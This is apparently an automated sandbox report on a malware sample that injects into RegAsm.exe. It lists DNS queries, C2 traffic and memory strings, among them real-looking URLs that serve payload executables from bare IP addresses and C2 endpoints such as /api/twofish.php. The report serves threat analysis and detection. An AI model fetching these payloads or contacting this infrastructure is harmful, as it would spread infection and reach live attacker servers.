Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: 240902180529931.tyr.zont16.com
Source: global traffic DNS traffic detected: DNS query: file-link-iota.vercel.app
Source: global traffic DNS traffic detected: DNS query: youtransfer.net
Source: global traffic DNS traffic detected: DNS query: iplogger.org
Source: global traffic DNS traffic detected: DNS query: stamppreewntnq.shop
Source: global traffic DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic DNS traffic detected: DNS query: traineiwnqo.shop
Source: global traffic DNS traffic detected: DNS query: condedqpwqm.shop
Source: global traffic DNS traffic detected: DNS query: t.me
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 06 Sep 2024 06:17:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 17268Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscrypto
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/lopsa/66d753b13350c_cry.exe#kiscryptoH
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exellg
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/malesa/66d1b7f7f3765_Front.exerZ
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66d70e8640404_trics.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe1
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeP
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exeb
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exei.dll
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exej
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66c6fcb30b9dd_123p.exen
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real9
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#real?
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#realC:
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#realStrong
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#reall
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/revada/66d98aa7bea3e_newPrime.exe#realw
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upus
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusG
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d59ef9d4404_premium.exe#upusZ
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xin
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xinB
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xinC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d897ad1752a_File.exe#xinryptolC
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1B
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1C:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/yuop/66d9de22f231f_crypted.exe#1usoU
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobr
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrZ
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.109/bobrp
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.33/ssl/install.exe
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.33/ssl/install.exeC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.113.115.33/ssl/install.exezAp
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/api/twofish.phpZA
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148/~
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/crazyfish.php
Source: RegAsm.exe, 00000002.00000002.1954978502.0000000004961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/twofish.php
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001179000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/twofish.phpB1CAD8C-2DAB-11D2-B604-00104B703EFD
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.143.223.148:80/api/twofish.php_C
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exe7
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeC:
Source: RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://240902180529931.tyr.zont16.com/f/fikbam0902931.exeZA
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exe
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exe0
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.9/nokia/lamp.exeC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#space
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#space?
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#spacet=
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/sgnr.exe#spaceuWZ
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#space
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spaceC:
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spaceQZ~
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spaceu4
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.29.235.52/vjgg.exe#spacez=
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://aka.ms/msal-net-iwa
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://aka.ms/valid-authorities
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gacan.zapto.org_DEBUG.zip/c
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PsIhedmEA44FNRssEU8V9OlH.exe, 00000007.00000003.1938610261.0000000002360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.innosetup.com/
Source: PsIhedmEA44FNRssEU8V9OlH.exe, 00000007.00000003.1938610261.0000000002360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: PsIhedmEA44FNRssEU8V9OlH.exe, 00000007.00000003.1938610261.0000000002360000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.remobjects.com/psU
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.com/?Download=MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.com/?seite=Microsoft/MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.com/?seite=Microsoft/MagicMouseTrails/History
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.de/?Download=MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.de/?seite=Microsoft/MagicMouseTrails
Source: gobEmOm5sr.exe, 00000000.00000000.1648178201.0000000000EDE000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.softwareok.de/?seite=Microsoft/MagicMouseTrails/History
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp, gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004C65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1947694025.000000000056B000.00000040.00000400.00020000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal-iwa
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal-net-broker-redirect-uri-android
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal_token_cache_serialization
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/adal_token_cache_serializationdFailed
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-brokers
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-brokers.
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-client-apps
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-interactive-android
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-2-released)
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3-breaking-changes
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3-breaking-changesy
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change)
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changeC
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-application-configuration
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-b2c
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-brokers
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-enable-keychain-access
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-enable-keychain-groups
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-iwa
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-system-browsers
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-up
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/msal-net-up)
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.msa/msal-net-3x-cache-breaking-change
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.datamarket.azure.com/data.ashx/
Source: 2Umx78uafM0WA03fzJyYYhBa.exe, 0000000E.00000002.2120842089.00000000043E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=jsonZC
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/J
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/catalog?client_id=
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/consent?client_id=
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/query?client_id=
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://datamarket.azure.com/embedded/resultrhttps://datamarket.accesscontrol.windows.net/v2/OAuth2-
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/&
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download=
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadC:
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/
Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003D0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app:80/download
Source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000000.1923341342.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: https://github.com/dotnet/wpf
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.000000000115C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp, gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004C65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1947694025.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/s
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001117000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33X
